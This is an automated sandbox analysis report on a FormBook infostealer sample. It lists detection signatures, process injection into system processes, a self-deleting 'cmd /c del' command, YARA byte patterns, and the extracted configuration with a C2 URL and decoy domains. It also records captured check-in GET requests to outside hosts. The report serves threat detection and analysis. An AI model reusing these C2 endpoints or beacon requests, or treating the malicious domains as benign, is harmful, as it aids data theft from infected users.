Analysis Report 444890321.exe

Overview

General Information

Sample Name: 444890321.exe
Analysis ID: 433174
MD5: f161fe51fee0cd2f542ea759241c88cb
SHA1: cd75d9c5a293151ad50dfa1d05edb5871fc08ad5
SHA256: d2d2d97ab2f2c78a230c58a61296504419d0b545c6c6d76193b654dfe9937499
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • 444890321.exe (PID: 5820 cmdline: 'C:\Users\user\Desktop\444890321.exe' MD5: F161FE51FEE0CD2F542EA759241C88CB)
    • 444890321.exe (PID: 6092 cmdline: 'C:\Users\user\Desktop\444890321.exe' MD5: F161FE51FEE0CD2F542EA759241C88CB)
      • backgroundTaskHost.exe (PID: 4160 cmdline: 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
        • cmd.exe (PID: 5568 cmdline: /c del 'C:\Users\user\Desktop\444890321.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • WWAHost.exe (PID: 4160 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • (string matches and offsets identical to the Formbook_1 entry for the first memory dump above)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.444890321.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.444890321.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.444890321.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
1.1.444890321.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.444890321.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • (string matches and offsets identical to the Formbook_1 entry for the first memory dump above)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: www.111bjs.com/ccr/ | Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 444890321.exe | Metadefender: Detection: 17%
Source: 444890321.exe | ReversingLabs: Detection: 67%
Yara detected FormBook
Source: Yara match | File source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 444890321.exe | Joe Sandbox ML: detected
Source: 1.2.444890321.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.WWAHost.exe.431f834.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 10.2.WWAHost.exe.34498d0.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.444890321.exe.23b0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.444890321.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 444890321.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: WWAHost.pdb | source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
Source: Binary string: MusNotifyIcon.pdb | source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP | source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: 444890321.exe, 00000000.00000003.207642896.00000000099C0000.00000004.00000001.sdmp, 444890321.exe, 00000001.00000002.265126021.0000000000A8F000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.470470953.0000000003F0F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: 444890321.exe, WWAHost.exe
Source: Binary string: MusNotifyIcon.pdbGCTL | source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\444890321.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\TileDataRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\system32\Windows.StateRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\SYSTEM32\usermgrcli.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\system32\StateRepository.Core.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\usermgrproxy.dll
Source: C:\Users\user\Desktop\444890321.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\444890321.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\444890321.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\444890321.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.169.40.107:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.169.40.107:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.169.40.107:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.111bjs.com/ccr/
Source: global traffic | HTTP traffic detected: GET /ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp HTTP/1.1 | Host: www.mekarauroko7389.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp HTTP/1.1 | Host: www.oklahomasundayschool.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp HTTP/1.1 | Host: www.shamushalkowich.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: Joe Sandbox View | ASN Name: INTERQGMOInternetIncJP
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: unknown | DNS traffic detected: queries for: www.mekarauroko7389.com
Source: 444890321.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 444890321.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: WWAHost.exe, 0000000A.00000002.472331929.000000000480F000.00000004.00000001.sdmp | String found in binary or memory: https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRev
Source: C:\Users\user\Desktop\444890321.exe | Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same MEMORY and UNPACKEDPE sources listed under "Yara detected FormBook" in the AV Detection section above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_00419D50 NtCreateFile,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_00419E00 NtReadFile,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_00419E80 NtClose,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_00419F30 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_00419DFB NtReadFile,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_00419F2B NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009DB040 NtSuspendThread,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\444890321.exe | Code function: 1_2_009D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DA770 NtOpenThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419E80 NtClose,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419DFB NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59730 NtQueryVirtualMemory,
